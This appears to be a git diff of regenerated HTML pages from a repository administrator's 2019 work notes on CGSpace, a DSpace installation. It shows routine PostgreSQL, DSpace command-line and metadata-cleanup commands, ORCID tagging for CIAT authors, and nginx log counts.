$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-08-31.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Elizabeth from CIAT sent me a list of sixteen authors who need to have their ORCID identifiers tagged with their publications
@ -338,27 +338,27 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Kihara, Job&quot;,&quot;Job Kihara: 0000-0002-4394-9553&quot;
&quot;Twyman, Jennifer&quot;,&quot;Jennifer Twyman: 0000-0002-8581-5668&quot;
&quot;Ishitani, Manabu&quot;,&quot;Manabu Ishitani: 0000-0002-6950-4018&quot;
&quot;Arango, Jacobo&quot;,&quot;Jacobo Arango: 0000-0002-4828-9398&quot;
&quot;Chavarriaga Aguirre, Paul&quot;,&quot;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&quot;
&quot;Paul, Birthe&quot;,&quot;Birthe Paul: 0000-0002-5994-5354&quot;
&quot;Eitzinger, Anton&quot;,&quot;Anton Eitzinger: 0000-0001-7317-3381&quot;
&quot;Hoek, Rein van der&quot;,&quot;Rein van der Hoek: 0000-0003-4528-7669&quot;
&quot;Aranzales Rondón, Ericson&quot;,&quot;Ericson Aranzales Rondon: 0000-0001-7487-9909&quot;
&quot;Staiger-Rivas, Simone&quot;,&quot;Simone Staiger: 0000-0002-3539-0817&quot;
&quot;de Haan, Stef&quot;,&quot;Stef de Haan: 0000-0001-8690-1886&quot;
&quot;Pulleman, Mirjam&quot;,&quot;Mirjam Pulleman: 0000-0001-9950-0176&quot;
&quot;Abera, Wuletawu&quot;,&quot;Wuletawu Abera: 0000-0002-3657-5223&quot;
&quot;Tamene, Lulseged&quot;,&quot;Lulseged Tamene: 0000-0002-3806-8890&quot;
&quot;Andrieu, Nadine&quot;,&quot;Nadine Andrieu: 0000-0001-9558-9302&quot;
&quot;Ramírez-Villegas, Julián&quot;,&quot;Julian Ramirez-Villegas: 0000-0002-8044-583X&quot;
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&#34;Kihara, Job&#34;,&#34;Job Kihara: 0000-0002-4394-9553&#34;
&#34;Twyman, Jennifer&#34;,&#34;Jennifer Twyman: 0000-0002-8581-5668&#34;
&#34;Ishitani, Manabu&#34;,&#34;Manabu Ishitani: 0000-0002-6950-4018&#34;
&#34;Arango, Jacobo&#34;,&#34;Jacobo Arango: 0000-0002-4828-9398&#34;
&#34;Chavarriaga Aguirre, Paul&#34;,&#34;Paul Chavarriaga-Aguirre: 0000-0001-7579-3250&#34;
&#34;Paul, Birthe&#34;,&#34;Birthe Paul: 0000-0002-5994-5354&#34;
&#34;Eitzinger, Anton&#34;,&#34;Anton Eitzinger: 0000-0001-7317-3381&#34;
&#34;Hoek, Rein van der&#34;,&#34;Rein van der Hoek: 0000-0003-4528-7669&#34;
&#34;Aranzales Rondón, Ericson&#34;,&#34;Ericson Aranzales Rondon: 0000-0001-7487-9909&#34;
&#34;Staiger-Rivas, Simone&#34;,&#34;Simone Staiger: 0000-0002-3539-0817&#34;
&#34;de Haan, Stef&#34;,&#34;Stef de Haan: 0000-0001-8690-1886&#34;
&#34;Pulleman, Mirjam&#34;,&#34;Mirjam Pulleman: 0000-0001-9950-0176&#34;
&#34;Abera, Wuletawu&#34;,&#34;Wuletawu Abera: 0000-0002-3657-5223&#34;
&#34;Tamene, Lulseged&#34;,&#34;Lulseged Tamene: 0000-0002-3806-8890&#34;
&#34;Andrieu, Nadine&#34;,&#34;Nadine Andrieu: 0000-0001-9558-9302&#34;
&#34;Ramírez-Villegas, Julián&#34;,&#34;Julian Ramirez-Villegas: 0000-0002-8044-583X&#34;
</code></pre><ul>
<li>I tested the file on my local development machine with the following invocation:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2019-09-19-ciat-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>In my test environment this added 390 ORCID identifiers</li>
<li>I ran the same updates on CGSpace and DSpace Test and then started a Discovery re-index to force the search index to update</li>
@ -386,15 +386,15 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
<li>Follow up with Marissa again about the CCAFS phase II project tags</li>
<li>Generate a list of the top 1500 authors on CGSpace:</li>
</ul>
<pre><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-09-19-top-1500-authors.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I used <code>csvcut</code> to select the column of author names, strip the header and quote characters, and saved the sorted file:</li>
</ul>
<pre><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed 's/&quot;//g' | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ csvcut -c text_value /tmp/2019-09-19-top-1500-authors.csv | grep -v text_value | sed &#39;s/&#34;//g&#39; | sort &gt; dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>After adding the XML formatting back to the file I formatted it using XML tidy:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-contributor-author.xml
</code></pre><ul>
<li>I created and merged <a href="https://github.com/ilri/DSpace/pull/433">a pull request for the updates</a>
<ul>
@ -416,7 +416,7 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>$ perl-rename -n 's/_{2,3}/_/g' *.pdf
<pre tabindex="0"><code>$ perl-rename -n &#39;s/_{2,3}/_/g&#39; *.pdf
</code></pre><ul>
<li>I was preparing to run SAFBuilder for the Bioversity migration and decided to check the list of PDFs on my local machine versus on DSpace Test (where I had downloaded them last month)
<ul>
@ -426,25 +426,25 @@ $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-s
</ul>
</li>
</ul>
<pre><code>$ rename -v 's/___/_/g' *.pdf
$ rename -v 's/__/_/g' *.pdf
<pre tabindex="0"><code>$ rename -v &#39;s/___/_/g&#39; *.pdf
$ rename -v &#39;s/__/_/g&#39; *.pdf
</code></pre><ul>
<li>I&rsquo;m still waiting to hear what Carol and Francesca want to do with the <code>1195.pdf.LCK</code> file (for now I&rsquo;ve removed it from the CSV, but for future reference it has the number 630 in its permalink)</li>
<li>I wrote two fairly long GREL expressions to clean up the institutional author names in the <code>dc.contributor.author</code> and <code>dc.identifier.citation</code> fields using OpenRefine
<ul>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&quot;:</li>
<li>The first targets acronyms in parentheses like &ldquo;International Livestock Research Institute (ILRI)&rdquo;:</li>
</ul>
</li>
</ul>
<pre><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/,? ?\((ANDES|APAFRI|APFORGEN|Canada|CFC|CGRFA|China|CacaoNet|CATAS|CDU|CIAT|CIRF|CIP|CIRNMA|COSUDE|Colombia|COA|COGENT|CTDT|Denmark|DfLP|DSE|ECPGR|ECOWAS|ECP\/GR|England|EUFORGEN|FAO|France|Francia|FFTC|Germany|GEF|GFU|GGCO|GRPI|italy|Italy|Italia|India|ICCO|ICAR|ICGR|ICRISAT|IDRC|INFOODS|IPGRI|IBPGR|ICARDA|ILRI|INIBAP|INBAR|IPK|ISG|IT|Japan|JIRCAS|Kenya|LI\-BIRD|Malaysia|NARC|NBPGR|Nepal|OOAS|RDA|RISBAP|Rome|ROPPA|SEARICE|Senegal|SGRP|Sweden|Syrian Arab Republic|The Netherlands|UNDP|UK|UNEP|UoB|UoM|United Kingdom|WAHO)\)/,&#34;&#34;)
</code></pre><ul>
<li>The second targets cities and countries after names like &ldquo;International Livestock Research Institute, Kenya&rdquo;:</li>
</ul>
<pre><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&quot;&quot;)
<pre tabindex="0"><code>replace(/,? ?(ali|Aleppo|Amsterdam|Beijing|Bonn|Burkina Faso|CN|Dakar|Gatersleben|London|Montpellier|Nairobi|New Delhi|Kaski|Kepong|Malaysia|Khumaltar|Lima|Ltpur|Ottawa|Patancheru|Peru|Pokhara|Rome|Uppsala|University of Mauritius|Tsukuba)/,&#34;&#34;)
</code></pre><ul>
<li>I imported the 1,427 Bioversity records with bitstreams to a new collection called <a href="https://dspacetest.cgiar.org/handle/10568/103688">2019-09-20 Bioversity Migration Test</a> on DSpace Test (after splitting them in two batches of about 700 each):</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx768m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx768m&#39;
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity1.map -s /home/aorth/Bioversity/bioversity1
$ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bioversity/bioversity2
</code></pre><ul>
@ -513,7 +513,7 @@ $ dspace import -a me@cgiar.org -m 2019-09-20-bioversity2.map -s /home/aorth/Bio
</li>
<li>Get a list of institutions from CCAFS&rsquo;s Clarisa API and try to parse it with <code>jq</code>, do some small cleanups and add a header in <code>sed</code>, and then pass it through <code>csvcut</code> to add line numbers:</li>
</ul>
<pre><code>$ cat ~/Downloads/institutions.json| jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/institutions.json| jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
$ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institutions-cleaned.csv -u
</code></pre><ul>
<li>The csv-metadata-quality tool caught a few records with excessive spacing and unnecessary Unicode</li>
@ -581,15 +581,15 @@ $ csv-metadata-quality -i /tmp/clarisa-institutions.csv -o /tmp/clarisa-institut
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -7,7 +7,7 @@
<meta property="og:title" content="October, 2019" />
<meta property="og:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc." />
<meta property="og:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2019-10/" />
<meta property="article:published_time" content="2019-10-01T13:20:51+03:00" />
@ -17,8 +17,8 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="October, 2019"/>
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="twitter:description" content="2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U&#43;00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc."/>
<meta name="generator" content="Hugo 0.133.1">
@ -48,12 +48,12 @@
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -99,7 +99,7 @@
<p class="blog-post-meta">
<time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -113,7 +113,7 @@
</ul>
</li>
</ul>
<pre><code>$ csvcut -c 'id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]' ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,dc.title[en_US],cg.coverage.region[en_US],cg.coverage.subregion[en_US],cg.river.basin[en_US]&#39; ~/Downloads/10568-16814.csv &gt; /tmp/iwmi-title-region-subregion-river.csv
</code></pre><ul>
<li>Then I replace them in vim with <code>:% s/\%u00a0/ /g</code> because I can&rsquo;t figure out the correct sed syntax to do it directly from the pipe above</li>
<li>I uploaded those to CGSpace and then re-exported the metadata</li>
@ -121,7 +121,7 @@
<li>I modified the script so it replaces the non-breaking spaces instead of removing them</li>
<li>Then I ran the csv-metadata-quality script to do some general cleanups (though I temporarily commented out the whitespace fixes because it was too many thousands of rows):</li>
</ul>
<pre><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x 'dc.date.issued,dc.date.issued[],dc.date.issued[en_US]' -u
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/10568-16814.csv -o /tmp/iwmi.csv -x &#39;dc.date.issued,dc.date.issued[],dc.date.issued[en_US]&#39; -u
</code></pre><ul>
<li>That fixed 153 items (unnecessary Unicode, duplicates, commaspace fixes, etc)</li>
<li>Release <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.3.1">version 0.3.1 of the csv-metadata-quality script</a> with the non-breaking spaces change</li>
@ -134,7 +134,7 @@
<ul>
<li>Create an account for Bioversity&rsquo;s ICT consultant Francesco on DSpace Test:</li>
</ul>
<pre><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p 'fffff'
<pre tabindex="0"><code>$ dspace user -a -m blah@mail.it -g Francesco -s Vernocchi -p &#39;fffff&#39;
</code></pre><ul>
<li>Email Francesca and Carol to ask for follow up about the test upload I did on 2019-09-21
<ul>
@ -193,20 +193,20 @@
</ul>
</li>
</ul>
<pre><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
<pre tabindex="0"><code>$ dspace user -a -m wow@me.com -g Felix -s Shaw -p &#39;fuananaaa&#39;
</code></pre><h2 id="2019-10-11">2019-10-11</h2>
<ul>
<li>I ran the DSpace cleanup function on CGSpace and it found some errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(171221) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(171221) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution, as always, is (repeat as many times as needed):</li>
</ul>
<pre><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);'
<pre tabindex="0"><code># su - postgres
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (171221);&#39;
UPDATE 1
</code></pre><h2 id="2019-10-12">2019-10-12</h2>
<ul>
@ -223,18 +223,18 @@ UPDATE 1
</ul>
</li>
</ul>
<pre><code>from,to
<pre tabindex="0"><code>from,to
CIAT,International Center for Tropical Agriculture
International Centre for Tropical Agriculture,International Center for Tropical Agriculture
International Maize and Wheat Improvement Center (CIMMYT),International Maize and Wheat Improvement Center
International Centre for Agricultural Research in the Dry Areas,International Center for Agricultural Research in the Dry Areas
International Maize and Wheat Improvement Centre,International Maize and Wheat Improvement Center
&quot;Agricultural Information Resource Centre, Kenya.&quot;,&quot;Agricultural Information Resource Centre, Kenya&quot;
&quot;Centre for Livestock and Agricultural Development, Cambodia&quot;,&quot;Centre for Livestock and Agriculture Development, Cambodia&quot;
&#34;Agricultural Information Resource Centre, Kenya.&#34;,&#34;Agricultural Information Resource Centre, Kenya&#34;
&#34;Centre for Livestock and Agricultural Development, Cambodia&#34;,&#34;Centre for Livestock and Agriculture Development, Cambodia&#34;
</code></pre><ul>
<li>Then I applied it with my <code>fix-metadata-values.py</code> script on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p 'fuuu' -f from -m 211 -t to
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f from -m 211 -t to
</code></pre><ul>
<li>I did some manual curation of about 300 authors in OpenRefine in preparation for telling Peter and Abenet that the migration is almost ready
<ul>
@ -260,17 +260,17 @@ International Maize and Wheat Improvement Centre,International Maize and Wheat I
</ul>
</li>
</ul>
<pre><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 82m35.993s
</code></pre><ul>
<li>After the re-indexing the top authors still list the following:</li>
</ul>
<pre><code>Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
<pre tabindex="0"><code>Jagwe, J.|Ouma, E.A.|Brandes-van Dorresteijn, D.|Kawuma, Brian|Smith, J.
</code></pre><ul>
<li>I looked in the database to find authors that had &ldquo;|&rdquo; in them:</li>
</ul>
<pre><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE '%|%';
<pre tabindex="0"><code>dspace=# SELECT text_value, resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value LIKE &#39;%|%&#39;;
text_value | resource_id
----------------------------------+-------------
Anandajayasekeram, P.|Puskur, R. | 157
@ -280,7 +280,7 @@ real 82m35.993s
</code></pre><ul>
<li>Then I found their handles and corrected them, for example:</li>
</ul>
<pre><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '157' and handle.resource_type_id=2;
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;157&#39; and handle.resource_type_id=2;
handle
-----------
10568/129
@ -304,20 +304,20 @@ real 82m35.993s
</ul>
</li>
</ul>
<pre><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ mkdir 2019-10-15-Bioversity
$ dspace export -i 10568/108684 -t COLLECTION -m -n 0 -d 2019-10-15-Bioversity
$ sed -i '/&lt;dcvalue element=&quot;identifier&quot; qualifier=&quot;uri&quot;&gt;/d' 2019-10-15-Bioversity/*/dublin_core.xml
$ sed -i &#39;/&lt;dcvalue element=&#34;identifier&#34; qualifier=&#34;uri&#34;&gt;/d&#39; 2019-10-15-Bioversity/*/dublin_core.xml
</code></pre><ul>
<li>It&rsquo;s really stupid, but for some reason the handles are included even though I specified the <code>-m</code> option, so after the export I removed the <code>dc.identifier.uri</code> metadata values from the items</li>
<li>Then I imported a test subset of them in my local test environment:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
<pre tabindex="0"><code>$ ~/dspace/bin/dspace import -a -c 10568/104049 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s /tmp/2019-10-15-Bioversity
</code></pre><ul>
<li>I had forgotten (again) that the <code>dspace export</code> command doesn&rsquo;t preserve collection ownership or mappings, so I will have to create a temporary collection on CGSpace to import these to, then do the mappings again after import&hellip;</li>
<li>On CGSpace I will increase the RAM of the command line Java process for good luck before import&hellip;</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map -s 2019-10-15-Bioversity
</code></pre><ul>
<li>After importing the 1,367 items I re-exported the metadata, changed the owning collections to those based on their type, then re-imported them</li>
@ -385,15 +385,15 @@ $ dspace import -a -c 10568/104057 -e fuu@cgiar.org -m 2019-10-15-Bioversity.map
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -15,17 +15,17 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
" />
<meta property="og:type" content="article" />
@ -45,20 +45,20 @@ I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 milli
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
So 4.6 million from XMLUI and another 1.2 million from API requests
Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -88,12 +88,12 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
